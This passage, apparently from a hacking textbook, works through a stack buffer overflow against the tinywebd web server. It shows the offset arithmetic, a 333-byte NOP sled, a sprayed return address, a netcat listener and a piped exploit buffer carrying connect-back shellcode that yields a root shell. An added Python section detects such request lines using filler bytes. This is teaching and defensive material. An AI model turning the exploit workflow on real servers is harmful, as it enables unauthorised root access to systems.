The debugger shows that the request buffer starts at 0xbffff5c0 and the stored return address is at 0xbffff7dc, which means the offset is 540 bytes. The safest place for the shellcode is near the middle of the 500-byte request buffer. In the output below, an exploit buffer is created that sandwiches the shellcode between a NOP sled and the return address repeated 32 times. The 128 bytes of repeated return address keep the shellcode out of unsafe stack memory, which might be overwritten. There are also unsafe bytes near the beginning of the exploit buffer, which will be overwritten during null termination. To keep the shellcode out of this range, a 100-byte NOP sled is put in front of it. This leaves a safe landing zone for the execution pointer, with the shellcode at 0xbffff624. The following output exploits the vulnerability using the loopback shellcode.
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell
reader@hacking:~/booksrc $ echo $((540+4 - (32*4) - 83))
333
reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 9835
reader@hacking:~/booksrc $ jobs
[1]+ Running nc -l -p 31337 &
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x333'; cat loopback_shell; perl -e 'print "\
x24\xf6\xff\xbf"x32 . "\r\n"') | nc -w 1 -v 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root
Since the offset to the return address is 540 bytes, 544 bytes are needed to overwrite the address. With the loopback shellcode at 83 bytes and the overwritten return address repeated 32 times, simple arithmetic shows that the NOP sled needs to be 333 bytes to align everything in the exploit buffer properly. netcat is run in listen mode with an ampersand (&) appended to the end, which sends the process to the background. This listens for the connection back from the shellcode and can be resumed later with the command fg (foreground). On the LiveCD, the at (@) symbol in the command prompt will change color if there are background jobs, which can also be listed with the jobs command. When the exploit buffer is piped into netcat, the -w option is used to tell it to time out after one second. Afterward, the backgrounded netcat process that received the connect-back shell can be resumed.
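The same request seen from the server's side, as an added example that is not code from the book: a check that flags request lines shaped like the exploit buffer above. It uses the 500-byte request buffer size and the 0xbffff624 address from the text; the detection thresholds and the two sample requests are constructed here, and the 83 bytes standing in for the shellcode are plain filler, not code.

```python
# Added example (not from the book): a defender-side check that flags HTTP
# request lines shaped like the overflow described above. The thresholds and
# the sample requests are constructed assumptions, not values from the text.
from collections import Counter

BUFFER_SIZE = 500        # size of tinywebd's request buffer (from the text)
NOP = 0x90               # x86 NOP opcode, the byte a NOP sled is built from
MIN_SLED = 16            # assumed: shortest NOP run worth flagging
MIN_ADDR_REPEATS = 8     # assumed: repeated 4-byte word count worth flagging


def longest_run(data: bytes, value: int) -> int:
    """Length of the longest run of consecutive bytes equal to value."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def most_repeated_word(data: bytes):
    """Most frequent 4-byte window at any offset, ignoring windows made of a
    single repeated byte (those are covered by the NOP-run check). A return
    address sprayed across the saved return pointer shows up here."""
    counts = Counter(
        data[i:i + 4]
        for i in range(len(data) - 3)
        if len(set(data[i:i + 4])) > 1
    )
    if not counts:
        return b"", 0
    return counts.most_common(1)[0]


def analyze_request(raw: bytes) -> dict:
    """Inspect the first line of a raw HTTP request and return indicators.

    tinywebd copies the request line into a fixed 500-byte buffer, so a line
    longer than that is already a red flag; a long run of 0x90 and a 4-byte
    word repeated dozens of times are the NOP sled and the sprayed address."""
    line = raw.split(b"\r\n", 1)[0]
    word, repeats = most_repeated_word(line)
    result = {
        "line_length": len(line),
        "oversized": len(line) > BUFFER_SIZE,
        "nop_sled": longest_run(line, NOP),
        "repeated_word": word,
        "repeats": repeats,
        "non_printable": sum(1 for b in line if b < 0x20 or b > 0x7E),
    }
    result["suspicious"] = (
        result["oversized"]
        or result["nop_sled"] >= MIN_SLED
        or repeats >= MIN_ADDR_REPEATS
    )
    return result


# Constructed sample mirroring the layout in the text: a 333-byte NOP sled,
# 83 placeholder bytes standing in for the shellcode (plain 'A's, not code),
# and the return address 0xbffff624 repeated 32 times, little-endian.
SAMPLE_ATTACK = b"\x90" * 333 + b"A" * 83 + b"\x24\xf6\xff\xbf" * 32 + b"\r\n"
# Constructed ordinary request for comparison.
SAMPLE_BENIGN = b"GET /index.html HTTP/1.1\r\nHost: localhost\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("attack", SAMPLE_ATTACK), ("benign", SAMPLE_BENIGN)):
        print(name, analyze_request(req))
```

On the constructed attack sample the three indicators line up with the arithmetic in the text: the line is 544 bytes (over the 500-byte buffer), the NOP run is 333 bytes, and the little-endian address word occurs exactly 32 times. A single oversized request line is the cheapest of the three signals to log at the server or proxy, since it needs no byte-pattern matching at all.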
All this works fine, but if shellcode of a different size is used, the NOP sled size must be recalculated. All these repetitive steps can be put into a single shell script.
The BASH shell allows for simple control structures. The if statement at the beginning of this script is just for error checking and displaying the usage